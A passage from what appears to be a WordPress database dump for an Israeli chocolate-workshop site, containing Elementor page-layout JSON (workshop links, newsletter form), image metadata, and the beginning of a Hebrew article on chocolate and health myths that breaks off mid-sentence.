\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(891,181,'_elementor_version','0.4'),(892,181,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(894,182,'_edit_last','1'),(895,182,'_edit_lock','1539084499:1'),(896,183,'_wp_attached_file','2018/05/choclate-addicted.jpg'),(897,183,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:630;s:4:\"file\";s:29:\"2018/05/choclate-addicted.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"choclate-addicted-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"choclate-addicted-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"choclate-addicted-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"choclate-addicted-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:29:\"choclate-addicted-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(898,182,'_thumbnail_id','183'),(899,182,'_wp_page_template','default'),(900,182,'_yoast_wpseo_primary_category','7'),(909,186,'_elementor_edit_mode','builder'),(910,186,'_wp_page_template','default'),(911,186,'_elementor_data','[{\"id\":\"64aada\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1423db10\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a73781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05de\\u05d9\\u05ea\\u05d5\\u05e1\\u05d9\\u05dd \\u05e2\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea: \\u05d4\\\"\\u05e2\\u05d5\\u05d1\\u05d3\\u05d5\\u05ea\\\" \\u05e9\\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05dc\\u05d4\\u05d0\\u05de\\u05d9\\u05df \\u05dc\\u05d4\\u05df<\\/h2><p>\\u05de\\u05d3\\u05d9 \\u05d7\\u05d5\\u05d3\\u05e9 \\u05de\\u05ea\\u05e4\\u05e8\\u05e1\\u05de\\u05d5\\u05ea \\u05d1\\u05ea\\u05e7\\u05e9\\u05d5\\u05e8\\u05ea \\\"\\u05e2\\u05d5\\u05d1\\u05d3\\u05d5\\u05ea\\\" \\u05d7\\u05d3\\u05e9\\u05d5\\u05ea \\u05d4\\u05e0\\u05d5\\u05d2\\u05e2\\u05d5\\u05ea \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d1\\u05d7\\u05d5\\u05d3\\u05e9 \\u05d0\\u05d7\\u05d3, \\u05d4\\u05e8\\u05d5\\u05e4\\u05d0\\u05d9\\u05dd \\u05d5\\u05d4\\u05de\\u05d3\\u05e2\\u05e0\\u05d9\\u05dd \\u05e7\\u05d5\\u05e8\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05dc\\u05d4\\u05e4\\u05e1\\u05d9\\u05e7 \\u05db\\u05dc\\u05d9\\u05dc \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05d1\\u05d7\\u05d5\\u05d3\\u05e9 \\u05e9\\u05dc\\u05d0\\u05d7\\u05e8\\u05d9\\u05d5, \\u05de\\u05e1\\u05ea\\u05d1\\u05e8 \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05dc\\u05d0 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05de\\u05e1\\u05e4\\u05d9\\u05e7 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05dc\\u05db\\u05df, \\u05d0\\u05d7\\u05ea \\u05d5\\u05dc\\u05ea\\u05de\\u05d9\\u05d3, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05e0\\u05d7\\u05dc\\u05d9\\u05e3 \\u05d0\\u05ea \\u05d4\\u05de\\u05d9\\u05ea\\u05d5\\u05e1\\u05d9\\u05dd \\u05d4\\u05e0\\u05e4\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea, \\u05e2\\u05dd \\u05d4\\u05d0\\u05de\\u05ea. \\u05e8\\u05de\\u05d6: \\u05db\\u05de\\u05d5 \\u05d1\\u05db\\u05dc \\u05d3\\u05d1\\u05e8 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd, \\u05de\\u05d9\\u05dc\\u05ea \\u05d4\\u05de\\u05e4\\u05ea\\u05d7 \\u05d4\\u05d9\\u05d0 \\u05de\\u05ea\\u05d9\\u05e0\\u05d5\\u05ea.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05d5\\u05d1 \\u05dc\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea<\\/strong><\\/h2><p>\\u05e4\\u05d5\\u05dc\\u05d9 \\u05e7\\u05e7\\u05d0\\u05d5, \\u05d4\\u05de\\u05e8\\u05db\\u05d9\\u05d1 \\u05d4\\u05e2\\u05d9\\u05e7\\u05e8\\u05d9 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d5\\u05dc\\u05d9\\u05e4\\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05d8\\u05d1\\u05e2\\u05d9\\u05d9\\u05dd. \\u05e8\\u05d0\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05e2\\u05d9\\u05d5\\u05ea \\u05de\\u05d5\\u05db\\u05d9\\u05d7\\u05d5\\u05ea \\u05e9\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05d0\\u05dc\\u05d5 \\u05de\\u05e1\\u05d9\\u05d9\\u05e2\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d7\\u05ea\\u05ea \\u05dc\\u05d7\\u05e5 \\u05d4\\u05d3\\u05dd \\u05d1\\u05e9\\u05dc \\u05d4\\u05ea\\u05db\\u05d5\\u05e0\\u05d5\\u05ea \\u05e0\\u05d5\\u05d2\\u05d3\\u05d5\\u05ea \\u05d4\\u05d7\\u05de\\u05e6\\u05d5\\u05df \\u05e9\\u05dc\\u05d4\\u05dd.<\\/p><p>\\u05d0\\u05da \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05d2\\u05dd \\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e9\\u05d5\\u05de\\u05df \\u05e8\\u05d5\\u05d5\\u05d9. \\u05d6\\u05d4\\u05d5 \\u05d4\\u05de\\u05db\\u05d9\\u05dc \\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d3\\u05d9 \\u05de\\u05de\\u05e0\\u05d5 \\u05e2\\u05dc\\u05d5\\u05dc \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05de\\u05e9\\u05e7\\u05dc \\u05e2\\u05d5\\u05d3\\u05e3, \\u05d5\\u05d4\\u05d2\\u05d1\\u05e8\\u05ea \\u05d4\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05de\\u05d7\\u05dc\\u05d5\\u05ea \\u05dc\\u05d1 \\u05d5\\u05db\\u05dc\\u05d9 \\u05d3\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05ea\\u05df \\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4<\\/strong><\\/h2><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05db\\u05de\\u05d5\\u05d9\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05e9\\u05dc \\u05e7\\u05e4\\u05d0\\u05d9\\u05df, \\u05e9\\u05e2\\u05e9\\u05d5\\u05d9 \\u05dc\\u05ea\\u05e8\\u05d5\\u05dd \\u05dc\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e9\\u05d4\\u05d5\\u05d0 \\u05de\\u05d2\\u05d1\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4 \\u05d1\\u05d2\\u05d5\\u05e3. \\u05d1\\u05e2\\u05d5\\u05d3 \\u05e9\\u05d6\\u05d4 \\u05e0\\u05db\\u05d5\\u05df, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05de\\u05e1\\u05e4\\u05e7\\u05d9\\u05dd \\u05e9\\u05d7\\u05e8\\u05d5\\u05e8 \\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4 \\u05de\\u05ea\\u05de\\u05e9\\u05db\\u05ea, \\u05d5\\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e9\\u05d5\\u05de\\u05df.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d1\\u05e8\\u05d9\\u05d0 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dc\\u05d1<\\/strong><\\/h2><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05de\\u05db\\u05d9\\u05dc \\u05d9\\u05d5\\u05ea\\u05e8 \\u05e7\\u05e7\\u05d0\\u05d5 \\u05de\\u05d5\\u05e6\\u05e7 \\u05d5\\u05d7\\u05de\\u05d0\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dc\\u05d1, \\u05d0\\u05da \\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05e4\\u05d5\\u05dc\\u05d9\\u05e4 \\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05ea\\u05dc\\u05d5\\u05d9\\u05d4 \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e9\\u05d1\\u05d5 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e2\\u05d5\\u05d1\\u05d3, \\u05d5\\u05dc\\u05db\\u05df \\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05d4\\u05ea\\u05de\\u05e7\\u05d3 \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05d4\\u05d9\\u05d9\\u05e6\\u05d5\\u05e8 \\u05e9\\u05dc \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05ea\\u05d4\\u05dc\\u05d9\\u05da \\u05d4\\u05d9\\u05d9\\u05e6\\u05d5\\u05e8, \\u05e0\\u05d9\\u05e7\\u05d5\\u05d9, \\u05ea\\u05e1\\u05d9\\u05e1\\u05d4, \\u05d6\\u05de\\u05df \\u05e6\\u05dc\\u05d9\\u05d9\\u05d4 \\u05d5\\u05d8\\u05de\\u05e4\\u05e8\\u05d8\\u05d5\\u05e8\\u05d4, \\u05ea\\u05d5\\u05e1\\u05e4\\u05ea \\u05d0\\u05dc\\u05e7\\u05dc\\u05d9\\u05d6\\u05e6\\u05d9\\u05d4 \\u05d5\\u05d4\\u05d5\\u05e1\\u05e4\\u05ea \\u05de\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05dc\\u05e7\\u05e7\\u05d0\\u05d5, \\u05db\\u05d2\\u05d5\\u05df \\u05e1\\u05d5\\u05db\\u05e8 \\u05dc\\u05de\\u05e9\\u05dc, \\u05de\\u05e1\\u05d9\\u05e8\\u05d9\\u05dd \\u05db\\u05de\\u05e2\\u05d8 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e4\\u05d5\\u05dc\\u05d9\\u05e4 \\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05de\\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05e8\\u05d9\\u05e8.<\\/p><h2><strong>\\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05df \\u05d0\\u05d7\\u05d3 \\u05d1\\u05d9\\u05d5\\u05dd \\u05dc\\u05d0 \\u05de\\u05d6\\u05d9\\u05e7 \\u05dc\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea<\\/strong><\\/h2><p>\\u05e0\\u05db\\u05d5\\u05df. \\u05db\\u05dc \\u05e2\\u05d5\\u05d3 \\u05de\\u05e1\\u05ea\\u05e4\\u05e7\\u05d9\\u05dd \\u05d1\\u05d7\\u05d8\\u05d9\\u05e3 \\u05e7\\u05d8\\u05df \\u05d6\\u05d4 \\u05d1\\u05dc\\u05d1\\u05d3. \\u05d7\\u05de\\u05d9\\u05e9\\u05d4 \\u05d7\\u05d8\\u05d9\\u05e4\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05dd, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d9\\u05d5\\u05d1\\u05d9\\u05dc\\u05d5 \\u05dc\\u05e2\\u05dc\\u05d9\\u05d9\\u05d4 \\u05d1\\u05de\\u05e9\\u05e7\\u05dc. \\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05d1\\u05de\\u05de\\u05d5\\u05e6\\u05e2 250 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05db\\u05de\\u05e2\\u05d8 \\u05e8\\u05d1\\u05e2 \\u05de\\u05e6\\u05e8\\u05d9\\u05db\\u05ea \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d5\\u05de\\u05dc\\u05e6\\u05ea \\u05d1\\u05d9\\u05d5\\u05dd.<\\/p><p>\\u05dc\\u05db\\u05df, \\u05d1\\u05de\\u05e7\\u05d5\\u05dd \\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05dc\\u05d5\\u05e9 \\u05e7\\u05d5\\u05d1\\u05d9\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05dd, \\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05d1\\u05e1\\u05d1\\u05d9\\u05d1\\u05d5\\u05ea 30-50 